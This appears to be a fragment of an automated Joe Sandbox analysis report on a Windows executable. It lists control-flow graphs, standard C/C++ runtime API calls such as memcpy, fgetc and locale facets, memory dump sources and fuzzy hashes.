7ff6a952fa01-7ff6a952fa14 7059->7064 7060->7006 7066 7ff6a952fad4-7ff6a952fada _invalid_parameter_noinfo_noreturn 7060->7066 7061->7057 7064->7006 7064->7066 7066->7000
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z.MSVCP140 ref: 00007FF6A952F83A
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140 ref: 00007FF6A952F8EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9531060: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953114E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9531060: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953115C
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A952FA89
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A952FAD4
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A952FB24
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A952FB2B
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A952FB31
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturnmemcpy$Concurrency::cancel_current_task$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 862015687-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bd3986c8eac70713546aec029172baba793e63043bb13c5cd23aaf52f6ef5959
                                                                                                                                                                                                                                                                                      • Instruction ID: 1077aec58ba0b2015cca95da2d928194e8acb877f88bd33345c05faf4c2c9d48
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd3986c8eac70713546aec029172baba793e63043bb13c5cd23aaf52f6ef5959
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AB1B162F0AB458AFF00DFB5E0852AD6362EB49B98F608271DE5D97B99DF38D445C300

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 7069 7ff6a9512aa0-7ff6a9512b0f call 7ff6a953a3dc 7072 7ff6a9512b11 7069->7072 7073 7ff6a9512b14-7ff6a9512b42 call 7ff6a9530220 7069->7073 7072->7073 7076 7ff6a9512b47-7ff6a9512b90 call 7ff6a9530220 7073->7076 7077 7ff6a9512b44 7073->7077 7080 7ff6a9512b92-7ff6a9512ba1 call 7ff6a9530f10 7076->7080 7081 7ff6a9512ba5-7ff6a9512be0 call 7ff6a9530370 * 2 call 7ff6a952e980 7076->7081 7077->7076 7080->7081 7090 7ff6a9512c60-7ff6a9512c6b 7081->7090 7091 7ff6a9512be2-7ff6a9512c20 call 7ff6a9530370 7081->7091 7092 7ff6a9512c89-7ff6a9512c94 call 7ff6a9531540 7090->7092 7093 7ff6a9512c6d-7ff6a9512c7c 7090->7093 7101 7ff6a9512c50-7ff6a9512c5b call 7ff6a9531060 7091->7101 7102 7ff6a9512c22-7ff6a9512c31 7091->7102 7099 7ff6a9512c95-7ff6a9512c9d 7092->7099 7095 7ff6a9512c7e 7093->7095 7096 7ff6a9512c81-7ff6a9512c87 7093->7096 7095->7096 7096->7099 7104 7ff6a9512c9f-7ff6a9512cb0 7099->7104 7105 7ff6a9512cd3-7ff6a9512ceb 7099->7105 7101->7090 7106 7ff6a9512c36-7ff6a9512c4e memcpy 7102->7106 7107 7ff6a9512c33 7102->7107 7108 7ff6a9512cce call 7ff6a953a960 7104->7108 7109 7ff6a9512cb2-7ff6a9512cc5 7104->7109 7110 7ff6a9512ced-7ff6a9512cfe 7105->7110 7111 7ff6a9512d21-7ff6a9512d4b call 7ff6a953a940 7105->7111 7106->7090 7107->7106 7108->7105 7109->7108 7115 7ff6a9512cc7-7ff6a9512ccd _invalid_parameter_noinfo_noreturn 7109->7115 7112 7ff6a9512d1c call 7ff6a953a960 7110->7112 7113 7ff6a9512d00-7ff6a9512d13 7110->7113 7112->7111 7113->7112 7117 7ff6a9512d15-7ff6a9512d1b _invalid_parameter_noinfo_noreturn 7113->7117 7115->7108 7117->7112
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __std_fs_code_page.MSVCPRT ref: 00007FF6A9512AFF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A3DC: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF6A9512B04), ref: 00007FF6A953A3E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A3DC: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF6A9512B04), ref: 00007FF6A953A3EF
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140 ref: 00007FF6A9512C40
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9531060: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953114E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9531060: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953115C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9531540: memcpy.VCRUNTIME140 ref: 00007FF6A9531622
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A9512CC7
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A9512D15
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_page
                                                                                                                                                                                                                                                                                      • String ID: ", "$: "
                                                                                                                                                                                                                                                                                      • API String ID: 217746928-747220369
                                                                                                                                                                                                                                                                                      • Opcode ID: 8af38dd4572e12346a7e861e0e5c0b37005e29a69315350ea585c524d2d42072
                                                                                                                                                                                                                                                                                      • Instruction ID: bebdac4d5cc0cc7e6811144d6405cfef0feeeea27a3f313c83863b1e049e9a93
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8af38dd4572e12346a7e861e0e5c0b37005e29a69315350ea585c524d2d42072
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7818862B06B419AEB00DF76E1913AD63B1FB49B88F208531DE5DA7B99DF38D065C340

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 7158 7ff6a952cb80-7ff6a952cbb5 7159 7ff6a952cbb7-7ff6a952cbc5 7158->7159 7160 7ff6a952cbe4-7ff6a952cbec 7158->7160 7159->7160 7161 7ff6a952cbc7-7ff6a952cbdf 7159->7161 7162 7ff6a952cbf8-7ff6a952cc03 7160->7162 7163 7ff6a952cbee-7ff6a952cbf3 7160->7163 7164 7ff6a952ce30-7ff6a952ce54 call 7ff6a953a940 7161->7164 7165 7ff6a952cc29-7ff6a952cc35 7162->7165 7166 7ff6a952cc05-7ff6a952cc27 7162->7166 7163->7164 7167 7ff6a952cc37-7ff6a952cc45 fgetwc 7165->7167 7168 7ff6a952cc53-7ff6a952cc7a fgetc 7165->7168 7166->7165 7170 7ff6a952ce2d 7167->7170 7171 7ff6a952cc4b-7ff6a952cc4e 7167->7171 7172 7ff6a952cc80-7ff6a952cc8b 7168->7172 7173 7ff6a952cd85 7168->7173 7170->7164 7171->7170 7175 7ff6a952ccad-7ff6a952ccb5 call 7ff6a9531540 7172->7175 7176 7ff6a952cc8d-7ff6a952ccab 7172->7176 7177 7ff6a952cd8a-7ff6a952cd92 7173->7177 7178 7ff6a952ccba-7ff6a952cd11 ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z 7175->7178 7176->7178 7177->7170 7180 7ff6a952cd98-7ff6a952cda9 7177->7180 7181 7ff6a952cd1c-7ff6a952cd2c 7178->7181 7182 7ff6a952cd13-7ff6a952cd16 7178->7182 7183 7ff6a952ce28 call 7ff6a953a960 7180->7183 7184 7ff6a952cdab-7ff6a952cdbe 7180->7184 7188 7ff6a952cddf-7ff6a952cdf6 7181->7188 7189 7ff6a952cd32-7ff6a952cd7f memcpy fgetc 7181->7189 7182->7181 7187 7ff6a952cdc7-7ff6a952cdca 7182->7187 7183->7170 7184->7183 7185 7ff6a952cdc0-7ff6a952cdc6 _invalid_parameter_noinfo_noreturn 7184->7185 7185->7187 7187->7173 7190 7ff6a952cdcc-7ff6a952cddd 7187->7190 7191 7ff6a952cdf8 7188->7191 7192 7ff6a952ce1f-7ff6a952ce23 7188->7192 7189->7172 7189->7173 7190->7177 7193 7ff6a952ce00-7ff6a952ce17 ungetc 7191->7193 7192->7177 7193->7192 7194 7ff6a952ce19-7ff6a952ce1d 7193->7194 7194->7193
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: fgetwc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2948136663-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bc5e876cd2a5ddaed97cc61b231dacbb275866b132a4b32473fa302d2f519a40
                                                                                                                                                                                                                                                                                      • Instruction ID: 7dbe2b41a96cafc7f883d1f969b15db689061caebcc42365f80de772e9060d64
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc5e876cd2a5ddaed97cc61b231dacbb275866b132a4b32473fa302d2f519a40
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A819622B19A8189EB108FA1D0913BC37B0FB49B98F644672DE5ED7B99DF38D494C340

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 7120 7ff6a952bed0-7ff6a952bf05 7121 7ff6a952bf07-7ff6a952bf15 7120->7121 7122 7ff6a952bf33-7ff6a952bf3b 7120->7122 7121->7122 7123 7ff6a952bf17-7ff6a952bf2e 7121->7123 7124 7ff6a952bf47-7ff6a952bf52 7122->7124 7125 7ff6a952bf3d-7ff6a952bf42 7122->7125 7126 7ff6a952c17f-7ff6a952c1a3 call 7ff6a953a940 7123->7126 7127 7ff6a952bf74-7ff6a952bf80 7124->7127 7128 7ff6a952bf54-7ff6a952bf72 7124->7128 7125->7126 7130 7ff6a952bf9e-7ff6a952bfc5 fgetc 7127->7130 7131 7ff6a952bf82-7ff6a952bf90 fgetc 7127->7131 7128->7127 7135 7ff6a952bfcb 7130->7135 7136 7ff6a952c0d5 7130->7136 7133 7ff6a952bf96-7ff6a952bf99 7131->7133 7134 7ff6a952c17d 7131->7134 7133->7134 7134->7126 7137 7ff6a952bfd0-7ff6a952bfdb 7135->7137 7138 7ff6a952c0da-7ff6a952c0e2 7136->7138 7139 7ff6a952bffd-7ff6a952c005 call 7ff6a9531540 7137->7139 7140 7ff6a952bfdd-7ff6a952bffb 7137->7140 7138->7134 7141 7ff6a952c0e8-7ff6a952c0f9 7138->7141 7142 7ff6a952c00a-7ff6a952c061 ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z 7139->7142 7140->7142 7144 7ff6a952c178 call 7ff6a953a960 7141->7144 7145 7ff6a952c0fb-7ff6a952c10e 7141->7145 7146 7ff6a952c06c-7ff6a952c07c 7142->7146 7147 7ff6a952c063-7ff6a952c066 7142->7147 7144->7134 7145->7144 7149 7ff6a952c110-7ff6a952c116 _invalid_parameter_noinfo_noreturn 7145->7149 7151 7ff6a952c12f-7ff6a952c146 7146->7151 7152 7ff6a952c082-7ff6a952c0cf memcpy fgetc 7146->7152 7147->7146 7150 7ff6a952c117-7ff6a952c11a 7147->7150 7149->7150 7150->7136 7155 7ff6a952c11c-7ff6a952c12d 7150->7155 7153 7ff6a952c148 7151->7153 7154 7ff6a952c16f-7ff6a952c173 7151->7154 7152->7136 7152->7137 7156 7ff6a952c150-7ff6a952c167 ungetc 7153->7156 7154->7138 7155->7138 7156->7154 7157 7ff6a952c169-7ff6a952c16d 7156->7157 7157->7156
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: fgetc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2807381905-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 16552ad37d9e7cabf55b3e3cc75e6a2ff078bb4e2370f03920dd24fe909c6b95
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d74b899be489505e76a741ea6207f5517e3e61eb82da9b0da9f8e33aca05088
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16552ad37d9e7cabf55b3e3cc75e6a2ff078bb4e2370f03920dd24fe909c6b95
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C916732B19A8189EB108F75D4923AC37B0FB49B68F644672DA5ED3B99DF38D494C300

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock_cexit_exit_get_narrow_winmain_command_line_register_thread_local_exe_atexit_callback
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3995423050-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8cd200ff3fb6af25363896647357835655dc0060ded9db8e5413d661c60862be
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d5731b1fdaeefecf400708a8c856023e2e5e854afeb7db97702fdbda53403a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cd200ff3fb6af25363896647357835655dc0060ded9db8e5413d661c60862be
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5312721E0F24646FA54AFB5A4773BBF381AF81744F644438E60ECB6D7DE2CE8488640
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 762505753-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ec5f6a21aabe5f9c8435868cf51c71f3e6cb25a39774f1962e251aade7b4fb19
                                                                                                                                                                                                                                                                                      • Instruction ID: 488631df0dd1b3c5c7dd549ea2ebeb20fd6ae8bf8d673a437aa6c55a94385db6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec5f6a21aabe5f9c8435868cf51c71f3e6cb25a39774f1962e251aade7b4fb19
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28314532A09B4586EB549F32E46116BB3A0FB88B94F580631EB9EC77A5DF3CE455C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskD@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3790006010-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b69f92b5355667ebdc3ce19b389c52e9cfeac78d885bf03dc3f624fafab4667e
                                                                                                                                                                                                                                                                                      • Instruction ID: 84bc667a012e4a2a77cc872f6d3018f245acbdeb6df68c62b3a8a8645b4108eb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b69f92b5355667ebdc3ce19b389c52e9cfeac78d885bf03dc3f624fafab4667e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3317022A0DB4582EB549F22E45116AB760FB88B94F680631EF9EC7768CF3CE455CB00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@_Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 929128910-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e0bdb12422ee04a853e0566a4f3154f032d1ba6b9776c41d7419da004f2b5f89
                                                                                                                                                                                                                                                                                      • Instruction ID: 05a25b00fefd62a776b7706e4a1fc2642a28fdc79a449be12f65d8cdfe842bdc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0bdb12422ee04a853e0566a4f3154f032d1ba6b9776c41d7419da004f2b5f89
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7316126A09B4182EB549F32E86116FB3A0FB88B94F580631EB9EC7765DF3CE555C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e2ff07d7e7b7174a6658ef68147ffba593fd2e1b48fcaba988834b00c6b17d8d
                                                                                                                                                                                                                                                                                      • Instruction ID: d83ae53f3a3711929d1b054f179afc233f4e47eaaac4ce50d2c03ac0a2bd851c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2ff07d7e7b7174a6658ef68147ffba593fd2e1b48fcaba988834b00c6b17d8d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE41DE62B0AB4195EE10AF35E4552AEA3A1EB48BE0F644732DA6DC7BD5DF3CE041C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ?tolower@?$ctype@D@std@@Xbad_alloc@std@@realloc$malloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2093286772-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 44ba41bed6653be0007f28916185984c70f8e26d81552fa844fb2e3913a512cf
